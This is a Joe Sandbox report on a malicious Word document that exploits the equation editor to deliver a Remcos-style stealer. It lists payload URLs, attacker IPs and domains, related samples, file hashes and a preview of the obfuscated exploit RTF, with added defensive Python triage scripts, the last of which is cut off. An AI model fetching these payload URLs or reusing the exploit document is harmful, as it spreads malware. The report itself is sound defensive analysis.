http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc | true | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF | true | | unknown
                                                                                                                                              unknown
                                                                                                                                              http://cdn.at.atwola.com/_media/uac/msn.htmlbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                                                  unknown
                                                                                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://91.134.96.177/80/uc/uc on 91.134.96.177.url.0.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://go.microsoft.c9Vpowershell.exe, 0000000C.00000002.442724340.000000000003A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://policies.yahoo.com/w3c/p3p.xmlbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.msn.com/advertisement.ad.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
Contacted IPs (flag legend: share of IPs per ASN, < 25% / 25-50% / 50-75% / > 75%)

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.78.54 | unknown | United States | 13335 | CLOUDFLARENETUS | false
45.90.89.98 | maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | Bulgaria | 33657 | CMCSUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
91.134.96.177 | unknown | France | 16276 | OVHFR | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.67.216.244 | og1.in | United States | 13335 | CLOUDFLARENETUS | true
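The URL rows and the IP table above are what a responder turns into indicators, but as extracted they run URL, source and Malicious flag together on one line, and most of the URLs are sandbox noise (browser cache files, CRL/OCSP endpoints PowerShell touches while validating certificates) rather than attacker infrastructure. The script below is an added triage example, not part of the Joe Sandbox report: it splits rows of that flattened shape back into columns, classifies each by where the sandbox found it, drops the noise and defangs what is left. The source-column markers (bhv*.tmp cache files, the process names seen in this run, dropped .url files) and the certificate-infrastructure rule are assumptions chosen to fit this report; the input rows are copied from the table above.

```python
"""Triage helper for the flattened URL rows of the report above (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed input: rows copied in the run-together "URL<source list><true|false>"
# shape in which the report's URL table was extracted.
RAW_URL_ROWS = [
    "https://contextual.media.net/8/nrrV73987.jsbhvACB4.tmp.16.dr, bhvC227.tmp.20.drfalse",
    "http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000012.00000002.454067819.0000000001F59000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://raw.githubusercontent.compowershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://91.134.96.177/80/uc/uc on 91.134.96.177.url.0.drfalse",
    "http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://go.microsoft.c9Vpowershell.exe, 0000000C.00000002.442724340.000000000003A000.00000004.00000020.00020000.00000000.sdmpfalse",
]

# Assumed markers for where the Source column begins: the sandbox's browser-cache
# files (bhv*.tmp.N.dr), the process names seen in this run, or a dropped .url file.
SOURCE_START = re.compile(
    r"bhv[0-9A-F]+\.tmp\.\d+\.dr"
    r"|powershell\.exe|RegAsm\.exe|wscript\.exe|EQNEDT32\.EXE"
    r"|[^/]+\.url\.\d+\.dr"
)
MALICIOUS_FLAG = re.compile(r"(true|false)$")


@dataclass(frozen=True)
class UrlRow:
    url: str
    sources: Tuple[str, ...]
    malicious: bool

    @property
    def host(self) -> str:
        return urlsplit(self.url).hostname or ""

    @property
    def source_kind(self) -> str:
        """browser_cache is sandbox browsing noise; dropped_file and process_memory
        come from the infection chain itself (EQNEDT32 -> wscript -> powershell -> RegAsm)."""
        if all(s.startswith("bhv") for s in self.sources):
            return "browser_cache"
        if any(s.endswith(".dr") for s in self.sources):
            return "dropped_file"
        return "process_memory"


def parse_row(row: str) -> UrlRow:
    """Split one flattened row back into URL, source list and Malicious flag."""
    flag = MALICIOUS_FLAG.search(row)
    if flag is None:
        raise ValueError(f"row has no Malicious column: {row!r}")
    body = row[: flag.start()]
    src = SOURCE_START.search(body)
    if src is None:
        raise ValueError(f"row has no recognisable Source column: {row!r}")
    sources = tuple(p.strip() for p in body[src.start():].split(", ") if p.strip())
    return UrlRow(body[: src.start()], sources, flag.group(1) == "true")


def parse_rows(rows: List[str]) -> List[UrlRow]:
    return [parse_row(r) for r in rows]


def is_cert_infra(row: UrlRow) -> bool:
    """CRL/OCSP/CPS URLs that PowerShell pulls out of certificates while building a
    chain; they show up in almost every run and are not attacker infrastructure."""
    url = row.url.lower().rstrip("0")  # strings scraped from memory often carry a stray trailing '0'
    return row.host.startswith(("crl.", "ocsp.")) or url.endswith((".crl", "/cps"))


def triage(rows: List[UrlRow]) -> Dict[str, List[UrlRow]]:
    """Keep only rows that came from the infection chain, grouped by host."""
    kept: Dict[str, List[UrlRow]] = {}
    for row in rows:
        if row.source_kind == "browser_cache" or is_cert_infra(row):
            continue
        kept.setdefault(row.host, []).append(row)
    return kept


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked when pasted into a ticket or chat."""
    p = urlsplit(url)
    out = f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"
    return out + (f"?{p.query}" if p.query else "")


if __name__ == "__main__":
    for host, rows in triage(parse_rows(RAW_URL_ROWS)).items():
        kinds = sorted({r.source_kind for r in rows})
        print(f"{defang('http://' + host):40} {', '.join(kinds)}")
        for r in rows:
            print(f"    {defang(r.url)}  <- {r.sources[0]}")
```

The source kind matters more than the Malicious column: a URL found in RegAsm.exe memory (imvu.com, ebuddy.com, the Google login URL) is a string embedded in the injected payload, typical of a credential stealer's target list, and is not evidence the host was contacted; the dropped `.url` file pointing at 91.134.96.177 and the IP table's `true` entries are the rows to cross-check against the PCAP before blocking anything.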
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522765
Start date and time: 2024-09-30 16:23:01 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 26
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AMG Cargo Logistic.docx
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@34/33@10/6
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 172
• Number of non-executed functions: 278
Cookbook Comments:
• Found application associated with file extension: .docx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Override analysis time to 80068.883614884 for currently running targets with high CPU consumption
• Override analysis time to 160137.767229768 for currently running targets with high CPU consumption
• Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3744 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3864 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• VT rate limit hit for: AMG Cargo Logistic.docx
Time | Type | Description
10:24:23 | API Interceptor | 70x Sleep call for process: EQNEDT32.EXE modified
10:24:27 | API Interceptor | 6x Sleep call for process: wscript.exe modified
10:24:28 | API Interceptor | 114x Sleep call for process: powershell.exe modified
10:24:36 | API Interceptor | 8598627x Sleep call for process: RegAsm.exe modified
Related samples by contacted IP

Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.78.54 | PI#0034250924.xla.xlsx | malicious | FormBook |
104.21.78.54 | PO554830092024.xls | malicious | Unknown |
104.21.78.54 | SYSN ORDER.xls | malicious | Snake Keylogger |
104.21.78.54 | PO554830092024.xls | malicious | Unknown |
104.21.78.54 | PI#0034250924.xla.xlsx | malicious | Unknown |
104.21.78.54 | PI#0034250924.xla.xlsx | malicious | Unknown |
104.21.78.54 | PO 11001 .xls | malicious | Remcos, GuLoader |
45.90.89.98 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer |
45.90.89.98 | gcnmTxDXTo.rtf | malicious | Remcos, PureLog Stealer |
45.90.89.98 | 17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exe | malicious | Remcos |
45.90.89.98 | 1726170845fe5c472375696bf668b3b528e9effd5f9dfb1a2108bcc6e243a091f1afc5c794629.dat-decoded.exe | malicious | Remcos |
45.90.89.98 | xnHel.rtf | malicious | Remcos |
45.90.89.98 | PO FT-151-2024 PETROMAT.xls | malicious | Remcos |
45.90.89.98 | August Shipment - Inv No. 041.xls | malicious | Remcos |
45.90.89.98 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf | malicious | Remcos |
45.90.89.98 | M12_20240821.xls | malicious | Remcos |
185.199.109.133 | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.199.109.133 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

Related samples by contacted domain

Match | Associated Sample Name / URL | Detection | Threat Name | Context
og1.in | PI#0034250924.xla.xlsx | malicious | FormBook | 172.67.216.244
og1.in | PO554830092024.xls | malicious | Unknown | 104.21.78.54
og1.in | SYSN ORDER.xls | malicious | Snake Keylogger | 172.67.216.244
og1.in | PO554830092024.xls | malicious | Unknown | 104.21.78.54
og1.in | PI#0034250924.xla.xlsx | malicious | Unknown | 104.21.78.54
og1.in | PO554830092024.xls | malicious | Unknown | 172.67.216.244
og1.in | PI#0034250924.xla.xlsx | malicious | Unknown | 104.21.78.54
og1.in | PO 11001 .xls | malicious | Remcos, GuLoader | 104.21.78.54
raw.githubusercontent.com | file.exe | malicious | XWorm, Xmrig | 185.199.111.133
raw.githubusercontent.com | RFQ-5120240930 VENETA PESCA SRL.vbs | malicious | VIP Keylogger | 185.199.110.133
raw.githubusercontent.com | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 185.199.110.133
raw.githubusercontent.com | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 185.199.111.133
raw.githubusercontent.com | C6DAEyTs7d.rtf | malicious | Remcos | 185.199.109.133
raw.githubusercontent.com | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 185.199.111.133
                                                                                                                                                                                                dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 185.199.111.133
                                                                                                                                                                                                4xBq1SMyQt.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                • 185.199.110.133
                                                                                                                                                                                                http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                geoplugin.netSecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: CMCSUS
  SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 45.66.231.90
  l.exe | malicious | Unknown | 45.66.231.185
  winx86.exe | malicious | Unknown | 45.66.231.185
  AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 45.90.89.98
  5qcJn1lfO5.rtf | malicious | Remcos, PureLog Stealer | 45.89.247.65
  bF9JDHS47l.vbs | malicious | Remcos | 45.66.231.89
  Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.doc | malicious | Remcos, PureLog Stealer | 45.89.247.65
  9FPFmh6r5t.exe | malicious | Remcos, GuLoader | 45.66.231.104
  gcnmTxDXTo.rtf | malicious | Remcos, PureLog Stealer | 45.90.89.98

Match: FASTLYUS
  file.exe | malicious | XWorm, Xmrig | 185.199.110.154
  Payment_Notification-Sep27.html | malicious | HTMLPhisher | 151.101.2.137
  https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | malicious | GRQ Scam | 151.101.2.208
  https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ== | malicious | HTMLPhisher | 151.101.2.137
  https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== | malicious | HTMLPhisher | 151.101.194.137
  https://magical-variation-300980.framer.app/ | malicious | HTMLPhisher | 151.101.130.137
  https://magical-variation-300980.framer.app/ | malicious | HTMLPhisher | 151.101.194.137
  INVOICE DUE..xlsx | malicious | HTMLPhisher | 151.101.66.137
  https://content.app-us1.com/5zbe53/2024/09/30/8d9df716-ca99-47ed-825e-d3a2a0e6cd9e.pdf | malicious | HTMLPhisher | 151.101.2.137

Match: CLOUDFLARENETUS
  file.exe | malicious | LodaRAT | 172.67.69.226
  Payment_Notification-Sep27.html | malicious | HTMLPhisher | 104.17.25.14
  XnQmVRj5g0.lnk | malicious | LonePage | 188.114.97.3
  Xkci1BfrmX.lnk | malicious | LonePage | 188.114.97.3
  Payment Advice Note_Pdf.exe | malicious | Azorult, GuLoader | 172.67.215.93
  https://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880 | malicious | Unknown | 104.18.22.177
  3140, EUR.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
  http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEq | malicious | Unknown | 1.1.1.1
  https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | malicious | GRQ Scam | 104.21.27.6
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 05af1f5ca1b87cc9cc9b25185115607d
  SYSN ORDER.xls | malicious | Snake Keylogger | 104.21.78.54, 185.199.109.133, 172.67.216.244
  C6DAEyTs7d.rtf | malicious | Remcos | 104.21.78.54, 185.199.109.133, 172.67.216.244
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 104.21.78.54, 185.199.109.133, 172.67.216.244
  dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 104.21.78.54, 185.199.109.133, 172.67.216.244
  58ADE05412907F657812BDA267C43288EA79418091.doc | malicious | Snake Keylogger, VIP Keylogger | 104.21.78.54, 185.199.109.133, 172.67.216.244
  New Order.doc | malicious | Snake Keylogger | 104.21.78.54, 185.199.109.133, 172.67.216.244
  0225139776.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 104.21.78.54, 185.199.109.133, 172.67.216.244
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 104.21.78.54, 185.199.109.133, 172.67.216.244
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | malicious | Remcos | 104.21.78.54, 185.199.109.133, 172.67.216.244

Match: 7dcce5b76c8b17472d024758970a406b
  PI#0034250924.xla.xlsx | malicious | FormBook | 172.67.216.244
  PO554830092024.xls | malicious | Unknown | 172.67.216.244
  SYSN ORDER.xls | malicious | Snake Keylogger | 172.67.216.244
  PO554830092024.xls | malicious | Unknown | 172.67.216.244
  PI#0034250924.xla.xlsx | malicious | Unknown | 172.67.216.244
  PO 11001 .xls | malicious | Remcos, GuLoader | 172.67.216.244
  Gelato Italiano_74695.exe.exe | malicious | Unknown | 172.67.216.244
  dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 172.67.216.244
  PO.xls | malicious | Remcos | 172.67.216.244
                                                                                                                                                                                                No context

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025623734588153504
Encrypted:false
SSDEEP:6:I3DPcJ64SHvxggLRjOZNEvHRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYGnOCvBvYg3J/
MD5:5D65BF2221243FB28855F824B066129B
SHA1:C06C438DE27EC2916CB11C696D61AFF9D631570A
SHA-256:F09D6501CE467A47318A59BD445C8CDD763804D08445BA37004D44CCE0A40396
SHA-512:9A535C1A5D53C9CD6B4B49F40C0911AB36484B64B99FAAD136CB4D3891A0F172BE8C03B59F0AA9252172FF74687878CF74FFE6BADE9769D61FBDE1D1A63AD9D8
Malicious:false
Preview:......M.eFy...z..#.hbI..9h..S,...X.F...Fa.q.................................yL......v............f..O...x.5^......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):4760
Entropy (8bit):4.834060479684549
Encrypted:false
SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5:838C1F472806CF4BA2A9EC49C27C2847
SHA1:D1C63579585C4740956B099697C74AD3E7C89751
SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious:false
Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:JSON data
Category:dropped
Size (bytes):962
Entropy (8bit):5.013811273052389
Encrypted:false
SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:false
Preview:
{
  "geoplugin_request":"8.46.123.33",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}

Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Rich Text Format data, version 1
Category:dropped
Size (bytes):115666
Entropy (8bit):2.7217050368726605
Encrypted:false
SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
MD5:5EAD5713E1263695BFF52404264DD3B4
SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
Malicious:false
Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, Author: ditekSHen
Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[
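The dropped-file records above list size, 8-bit entropy and four hashes per file, and the RTF record carries a Yara hit for a non-standard RTF header with embedded objects. The script below is an added example for reproducing that triage offline; it is not part of the Joe Sandbox report and not the ditekSHen rule. The RTF checks are this editor's own heuristics (the "{\rtf1" header test, a control word that starts with a non-letter after "\*\" as in the dropped file's "{\*\2nTUYQGK..." destination, and a hand-picked list of object control words), and SAMPLE_RTF is a constructed byte string modelled on the dropped file's preview, not the real file.

```python
import hashlib
import math
import re
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant byte
    stream, 8.0 for a uniform one. This is the quantity the report
    lists as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(data: bytes) -> dict:
    """Recompute the per-file fields the report lists for a dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


# RTF control words consist of ASCII letters, so a destination written as
# "\*\<digit>..." (as in the dropped file's "{\*\2nTUYQGK...") is not
# something a legitimate RTF writer emits. "{\rtf1" is the only published
# RTF version header, but Word also accepts truncated or altered headers
# such as "{\rt"; that is the "non-standard version" in the rule description.
# Both checks and the object-word list are this example's own heuristics.
_BAD_DESTINATION = re.compile(rb"\\\*\\[^a-zA-Z]")
_OBJECT_WORDS = (b"\\objemb", b"\\objdata", b"\\objupdate", b"\\objlink",
                 b"\\objautlink", b"\\objhtml", b"\\objclass")


def rtf_indicators(data: bytes) -> dict:
    """Heuristic RTF triage modelled on the report's Yara hit (not the rule itself)."""
    is_rtf = data.startswith(b"{\\rt")
    nonstandard_version = is_rtf and not data.startswith(b"{\\rtf1")
    bad_destination = _BAD_DESTINATION.search(data) is not None
    objects = [w.decode() for w in _OBJECT_WORDS if w in data]
    return {
        "is_rtf": is_rtf,
        "nonstandard_version": nonstandard_version,
        "bad_destination": bad_destination,
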